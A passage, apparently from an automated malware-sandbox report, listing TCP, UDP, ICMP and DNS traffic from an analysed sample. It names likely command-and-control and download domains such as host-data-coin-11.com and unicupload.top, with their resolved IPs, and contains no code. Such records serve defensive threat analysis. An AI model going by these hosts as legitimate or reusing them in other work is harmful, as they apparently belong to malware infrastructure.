                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084450960 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084487915 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084539890 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084568024 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084584951 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084595919 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084623098 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084672928 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084676027 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084709883 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084744930 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084767103 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084786892 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084839106 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084840059 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084920883 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084964991 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084980965 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.085000038 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.085035086 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.085046053 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.085071087 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.085105896 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.085120916 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.085141897 CET804974631.28.27.130192.168.2.3

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.217233896 CET5745953192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.541124105 CET53574598.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.691252947 CET5787553192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.707922935 CET53578758.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.851393938 CET5415453192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.870893955 CET53541548.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:42.707637072 CET5280653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.058644056 CET53528068.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.200268984 CET5391053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.218658924 CET53539108.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.394961119 CET6402153192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.680985928 CET53640218.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.833400011 CET6078453192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.120966911 CET53607848.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.260734081 CET5114353192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.281660080 CET53511438.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.422049999 CET5600953192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.441220045 CET53560098.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:45.909495115 CET5902653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:46.865468025 CET5902653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:46.882522106 CET53590268.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.041889906 CET4957253192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.060658932 CET53495728.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.193902016 CET6082353192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.235928059 CET53590268.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.479100943 CET53608238.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.598608017 CET5213053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.619102955 CET53521308.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.752298117 CET5510253192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.772350073 CET53551028.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.552265882 CET5265053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.570952892 CET53526508.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.708462954 CET6329753192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.725483894 CET53632978.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.860955954 CET5361553192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:53.866424084 CET5361553192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:53.883008957 CET53536158.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.113507986 CET5072853192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.131659031 CET53507288.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.277312040 CET5377753192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.295417070 CET53537778.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.454365015 CET5710653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.472807884 CET53571068.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.614479065 CET5677353192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.631575108 CET53567738.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.769443989 CET6098253192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:55.095309019 CET53609828.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:55.201818943 CET53536158.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.783145905 CET5153953192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.802175999 CET53515398.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.944598913 CET5539353192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.963454962 CET53553938.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.102482080 CET6345653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.121001005 CET53634568.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.257829905 CET5854053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.276771069 CET53585408.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.190661907 CET5894253192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.378829956 CET6443253192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.395519972 CET53644328.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.517251015 CET53589428.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.534061909 CET4925053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.552567959 CET53492508.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.686079025 CET6349053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.702549934 CET53634908.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.841101885 CET6511053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.862255096 CET53651108.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.179722071 CET6112053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.197926044 CET53611208.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.334943056 CET5307953192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.353663921 CET53530798.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.501017094 CET5082453192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.519733906 CET53508248.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:23.878406048 CET6285553192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:23.895402908 CET53628558.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:24.094566107 CET5104653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:24.113950014 CET53510468.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.814348936 CET6550153192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.833362103 CET53655018.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.976829052 CET5346553192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.995177984 CET53534658.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.133497000 CET4929053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.150490046 CET53492908.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.285944939 CET5975453192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.303849936 CET53597548.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.447638988 CET4923453192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.466438055 CET53492348.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.607171059 CET5872053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.625623941 CET53587208.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:29.711066961 CET5744753192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:29.730024099 CET53574478.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.033101082 CET6358353192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.051368952 CET53635838.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.212802887 CET6409953192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.232072115 CET53640998.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.377171993 CET6461053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.395318031 CET53646108.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.562076092 CET5198953192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.580720901 CET53519898.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.712343931 CET5315253192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.728912115 CET53531528.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.946669102 CET6159053192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.965697050 CET53615908.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.152858019 CET5607753192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.169862032 CET53560778.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.319572926 CET5795153192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.335908890 CET53579518.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.070162058 CET5327653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.088336945 CET53532768.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.226561069 CET6013553192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.246359110 CET53601358.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.428462029 CET4984953192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.450301886 CET53498498.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:34.896778107 CET6025353192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:34.915153980 CET53602538.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:23:35.071382046 CET5870653192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:23:35.090267897 CET53587068.8.8.8192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:24:07.895632982 CET4996753192.168.2.38.8.8.8
                                                                                                                                                                                                          Dec 31, 2021 19:24:07.914108038 CET53499678.8.8.8192.168.2.3

                                                                                                                                                                                                          ICMP Packets

                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.236331940 CET192.168.2.38.8.8.8d008(Port unreachable)Destination Unreachable
                                                                                                                                                                                                          Dec 31, 2021 19:22:55.201888084 CET192.168.2.38.8.8.8d001(Port unreachable)Destination Unreachable

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.217233896 CET192.168.2.38.8.8.80x5424Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.691252947 CET192.168.2.38.8.8.80x59Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.851393938 CET192.168.2.38.8.8.80x473fStandard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:42.707637072 CET192.168.2.38.8.8.80x1a5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.200268984 CET192.168.2.38.8.8.80x529eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.394961119 CET192.168.2.38.8.8.80x6a19Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.833400011 CET192.168.2.38.8.8.80x80fcStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.260734081 CET192.168.2.38.8.8.80xc7c7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.422049999 CET192.168.2.38.8.8.80x7479Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:45.909495115 CET192.168.2.38.8.8.80x9310Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:46.865468025 CET192.168.2.38.8.8.80x9310Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.041889906 CET192.168.2.38.8.8.80x4f03Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.193902016 CET192.168.2.38.8.8.80xeab6Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.598608017 CET192.168.2.38.8.8.80xa2a0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.752298117 CET192.168.2.38.8.8.80x30e0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.552265882 CET192.168.2.38.8.8.80x77Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.708462954 CET192.168.2.38.8.8.80x7895Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.860955954 CET192.168.2.38.8.8.80x2d21Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:53.866424084 CET192.168.2.38.8.8.80x2d21Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.113507986 CET192.168.2.38.8.8.80xcf32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.277312040 CET192.168.2.38.8.8.80xbc5cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.454365015 CET192.168.2.38.8.8.80x165aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.614479065 CET192.168.2.38.8.8.80x52daStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.769443989 CET192.168.2.38.8.8.80xa247Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.783145905 CET192.168.2.38.8.8.80x5989Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.944598913 CET192.168.2.38.8.8.80x6dc8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.102482080 CET192.168.2.38.8.8.80xb588Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:57.257829905 CET192.168.2.38.8.8.80x1f6aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.190661907 CET192.168.2.38.8.8.80x5db5Standard query (0)file-file-host4.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.378829956 CET192.168.2.38.8.8.80x9d1dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.534061909 CET192.168.2.38.8.8.80xdebbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.686079025 CET192.168.2.38.8.8.80xa0fdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:59.841101885 CET192.168.2.38.8.8.80xe95Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.179722071 CET192.168.2.38.8.8.80x2337Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.334943056 CET192.168.2.38.8.8.80x2626Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:02.501017094 CET192.168.2.38.8.8.80x18c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:23.878406048 CET192.168.2.38.8.8.80x23f9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:24.094566107 CET192.168.2.38.8.8.80x47e1Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.814348936 CET192.168.2.38.8.8.80x69e3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:25.976829052 CET192.168.2.38.8.8.80xd982Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.133497000 CET192.168.2.38.8.8.80x5b97Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.285944939 CET192.168.2.38.8.8.80xe815Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.447638988 CET192.168.2.38.8.8.80xe814Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:26.607171059 CET192.168.2.38.8.8.80xb76Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:29.711066961 CET192.168.2.38.8.8.80x543cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.033101082 CET192.168.2.38.8.8.80x7ae6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.212802887 CET192.168.2.38.8.8.80xd12dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.377171993 CET192.168.2.38.8.8.80x88beStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.562076092 CET192.168.2.38.8.8.80xd2a7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.712343931 CET192.168.2.38.8.8.80x3bc6Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:31.946669102 CET192.168.2.38.8.8.80x720cStandard query (0)bitly.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.152858019 CET192.168.2.38.8.8.80x8863Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:32.319572926 CET192.168.2.38.8.8.80xd7aStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.070162058 CET192.168.2.38.8.8.80xe046Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.226561069 CET192.168.2.38.8.8.80x3691Standard query (0)short.linkA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:33.428462029 CET192.168.2.38.8.8.80xbcbbStandard query (0)dodecoin.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:34.896778107 CET192.168.2.38.8.8.80x77b9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:23:35.071382046 CET192.168.2.38.8.8.80xa50cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:24:07.895632982 CET192.168.2.38.8.8.80x2bd9Standard query (0)t.meA (IP address)IN (0x0001)

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.541124105 CET8.8.8.8192.168.2.30x5424No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.707922935 CET8.8.8.8192.168.2.30x59No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.870893955 CET8.8.8.8192.168.2.30x473fNo error (0)privacytools-foryou-777.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.058644056 CET8.8.8.8192.168.2.30x1a5No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.218658924 CET8.8.8.8192.168.2.30x529eNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:43.680985928 CET8.8.8.8192.168.2.30x6a19No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.120966911 CET8.8.8.8192.168.2.30x80fcNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.281660080 CET8.8.8.8192.168.2.30xc7c7No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:44.441220045 CET8.8.8.8192.168.2.30x7479No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:46.882522106 CET8.8.8.8192.168.2.30x9310No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.060658932 CET8.8.8.8192.168.2.30x4f03No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.235928059 CET8.8.8.8192.168.2.30x9310No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.479100943 CET8.8.8.8192.168.2.30xeab6No error (0)data-host-coin-8.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.619102955 CET8.8.8.8192.168.2.30xa2a0No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:47.772350073 CET8.8.8.8192.168.2.30x30e0No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.570952892 CET8.8.8.8192.168.2.30x77No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:52.725483894 CET8.8.8.8192.168.2.30x7895No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:53.883008957 CET8.8.8.8192.168.2.30x2d21No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.131659031 CET8.8.8.8192.168.2.30xcf32No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.295417070 CET8.8.8.8192.168.2.30xbc5cNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.472807884 CET8.8.8.8192.168.2.30x165aNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:54.631575108 CET8.8.8.8192.168.2.30x52daNo error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:55.095309019 CET8.8.8.8192.168.2.30xa247No error (0)data-host-coin-8.com31.28.27.130A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:55.201818943 CET8.8.8.8192.168.2.30x2d21No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                          Dec 31, 2021 19:22:56.802175999 CET8.8.8.8192.168.2.30x5989No error (0)host-data-coin-11.com31.28.27.130A (IP address)IN (0x0001)
